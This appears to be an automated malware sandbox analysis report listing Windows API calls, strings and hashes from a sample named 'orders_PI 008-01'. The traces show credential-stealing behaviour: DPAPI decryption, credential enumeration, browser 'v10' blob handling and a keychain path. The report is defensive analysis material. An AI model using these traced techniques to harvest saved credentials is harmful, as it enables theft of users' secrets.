11 API calls 40469->40470 40471 437399 40470->40471 40472 43739d 40471->40472 40475 4373ac 40471->40475 40544 4446ea 11 API calls 40472->40544 40474 4373a7 40474->40438 40476 416935 16 API calls 40475->40476 40477 4373ca 40476->40477 40479 438460 134 API calls 40477->40479 40483 4251c4 137 API calls 40477->40483 40487 415a91 memset 40477->40487 40490 43758f 40477->40490 40502 437584 40477->40502 40504 437d3c 135 API calls 40477->40504 40545 425433 13 API calls 40477->40545 40546 425413 17 API calls 40477->40546 40547 42533e 16 API calls 40477->40547 40548 42538f 16 API calls 40477->40548 40549 42453e 123 API calls 40477->40549 40478 4375bc 40481 415c7d 16 API calls 40478->40481 40479->40477 40482 4375d2 40481->40482 40482->40474 40484 4442e6 11 API calls 40482->40484 40483->40477 40485 4375e2 40484->40485 40485->40474 40552 444283 13 API calls 40485->40552 40487->40477 40550 42453e 123 API calls 40490->40550 40491 4375f4 40496 437620 40491->40496 40497 43760b 40491->40497 40495 43759f 40498 416935 16 API calls 40495->40498 40500 416935 16 API calls 40496->40500 40553 444283 13 API calls 40497->40553 40498->40502 40500->40474 40502->40478 40551 42453e 123 API calls 40502->40551 40503 437612 memcpy 40503->40474 40504->40477 40505->40422 40506->40441 40507->40439 40508->40422 40509->40446 40510->40456 40511->40453 40512->40446 40513->40446 40515 41bc3b 101 API calls 40514->40515 40516 41f1b4 40515->40516 40517 41edad 86 API calls 40516->40517 40524 41f282 40516->40524 40518 41f1cb 40517->40518 40519 41f1f5 memcmp 40518->40519 40520 41f20e 40518->40520 40518->40524 40519->40520 40521 41f21b memcmp 40520->40521 40520->40524 40522 41f326 40521->40522 40525 41f23d 40521->40525 40523 41ee6b 86 API calls 40522->40523 40522->40524 40523->40524 40524->40465 40525->40522 40526 41f28e memcmp 40525->40526 40528 41c8df 56 API calls 40525->40528 40526->40522 40527 41f2a9 40526->40527 40527->40522 40530 41f308 40527->40530 40531 41f2d8 40527->40531 40529 41f269 40528->40529 
40529->40522 40532 41f287 40529->40532 40533 41f27a 40529->40533 40530->40522 40537 4446ce 11 API calls 40530->40537 40534 41ee6b 86 API calls 40531->40534 40532->40526 40535 41ee6b 86 API calls 40533->40535 40536 41f2e0 40534->40536 40535->40524 40538 41b1ca memset 40536->40538 40537->40522 40538->40524 40539->40465 40540->40465 40541->40465 40542->40459 40543->40460 40544->40474 40545->40477 40546->40477 40547->40477 40548->40477 40549->40477 40550->40495 40551->40478 40552->40491 40553->40503 40554->40237 40555->40243 40556->40253 40557->40255 40558->40252 40559->40256 40560->40255 40561->40260 40562->40262 40563->40264 40564->40266 40565->40268 40566->40270 40567->40272 40576 4238ad memset memcpy 40568->40576 40570 423ca5 40571 415a91 memset 40570->40571 40572 423cc3 40571->40572 40572->40281 40573->40281 40574->40281 40575->40275 40576->40570 40577 441819 40580 430737 40577->40580 40579 441825 40579->40579 40581 430756 40580->40581 40593 43076d 40580->40593 40582 430774 40581->40582 40583 43075f 40581->40583 40595 43034a memcpy 40582->40595 40594 4169a7 11 API calls 40583->40594 40586 4307ce 40588 430819 memset 40586->40588 40596 415b2c 11 API calls 40586->40596 40587 43077e 40587->40586 40591 4307fa 40587->40591 40587->40593 40588->40593 40590 4307e9 40590->40588 40590->40593 40597 4169a7 11 API calls 40591->40597 40593->40579 40594->40593 40595->40587 40596->40590 40597->40593 40598 41493c EnumResourceNamesW

                                        Control-flow Graph
                                        APIs
                                        • memset.MSVCRT ref: 0040DDAD
                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                        • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                          • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                        • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                        • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                        • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                        • _wcsicmp.MSVCRT ref: 0040DEB2
                                        • _wcsicmp.MSVCRT ref: 0040DEC5
                                        • _wcsicmp.MSVCRT ref: 0040DED8
                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                        • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                        • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                        • memset.MSVCRT ref: 0040DF5F
                                        • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                        • _wcsicmp.MSVCRT ref: 0040DFB2
                                        • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                        • String ID: dllhost.exe$p+Fw@FFw@BFw$taskhost.exe$taskhostex.exe
                                        • API String ID: 708747863-4209158791
                                        • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                        • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                        • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                        • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                        Control-flow Graph
                                        APIs
                                          • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                        • memset.MSVCRT ref: 00413D7F
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                        • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                        • memset.MSVCRT ref: 00413E07
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                        • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                        • free.MSVCRT ref: 00413EC1
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                        • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                        • String ID: QueryFullProcessImageNameW$kernel32.dll
                                        • API String ID: 1344430650-1740548384
                                        • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                        • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                        • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                        • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                        Control-flow Graph
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                        • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                        • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                        • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                        • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                        • String ID: AE$BIN
                                        • API String ID: 1668488027-3931574542
                                        • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                        • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                        • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                        • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                        APIs
                                          • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                          • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                          • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                        • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                        • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                        • free.MSVCRT ref: 00418803
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                        • String ID:
                                        • API String ID: 1355100292-0
                                        • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                        • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                        • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                        • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                        APIs
                                        • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                        • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                        • String ID:
                                        • API String ID: 767404330-0
                                        • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                        • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                        • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                        • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                        APIs
                                        • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                        • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileFind$FirstNext
                                        • String ID:
                                        • API String ID: 1690352074-0
                                        • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                        • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                        • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                        • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                        APIs
                                        • memset.MSVCRT ref: 0041898C
                                        • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: InfoSystemmemset
                                        • String ID:
                                        • API String ID: 3558857096-0
                                        • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                        • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                        • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                        • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                        Control-flow Graph (rendered graph not reproduced in text; function entry block 44553b-445558)

                                        APIs
                                        • memset.MSVCRT ref: 004455C2
                                        • wcsrchr.MSVCRT ref: 004455DA
                                        • memset.MSVCRT ref: 0044570D
                                        • memset.MSVCRT ref: 00445725
                                          • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                          • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                          • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                          • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                          • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                          • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                          • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                          • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                        • memset.MSVCRT ref: 0044573D
                                        • memset.MSVCRT ref: 00445755
                                        • memset.MSVCRT ref: 004458CB
                                        • memset.MSVCRT ref: 004458E3
                                        • memset.MSVCRT ref: 0044596E
                                        • memset.MSVCRT ref: 00445A10
                                        • memset.MSVCRT ref: 00445A28
                                        • memset.MSVCRT ref: 00445AC6
                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                          • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                          • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                          • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                          • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                          • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                        • memset.MSVCRT ref: 00445B52
                                        • memset.MSVCRT ref: 00445B6A
                                        • memset.MSVCRT ref: 00445C9B
                                        • memset.MSVCRT ref: 00445CB3
                                        • _wcsicmp.MSVCRT ref: 00445D56
                                        • memset.MSVCRT ref: 00445B82
                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                          • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                          • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                          • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                          • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                        • memset.MSVCRT ref: 00445986
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                        • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                        • API String ID: 1963886904-3798722523
                                        • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                        • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                        • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                        • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                          • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                          • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                          • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                        • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                        • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                        • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                        • String ID: $/deleteregkey$/savelangfile
                                        • API String ID: 2744995895-28296030
                                        • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                        • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                        • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                        • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 0040B71C
                                          • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                          • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                        • wcsrchr.MSVCRT ref: 0040B738
                                        • memset.MSVCRT ref: 0040B756
                                        • memset.MSVCRT ref: 0040B7F5
                                        • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                        • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                        • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                        • memset.MSVCRT ref: 0040B851
                                        • memset.MSVCRT ref: 0040B8CA
                                        • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                          • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                          • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                          • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                        • memset.MSVCRT ref: 0040BB53
                                        • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                        • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                        • String ID: chp$v10
                                        • API String ID: 1297422669-2783969131
                                        • Opcode ID: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                        • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                        • Opcode Fuzzy Hash: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                        • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                        Control-flow Graph (rendered graph not reproduced in text; function entry block 40e2ab-40e2ce)

                                        APIs
                                          • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                          • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                        • free.MSVCRT ref: 0040E49A
                                          • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                        • memset.MSVCRT ref: 0040E380
                                          • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                          • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                        • wcschr.MSVCRT ref: 0040E3B8
                                        • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75572EE0), ref: 0040E3EC
                                        • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75572EE0), ref: 0040E407
                                        • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,75572EE0), ref: 0040E422
                                        • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,75572EE0), ref: 0040E43D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
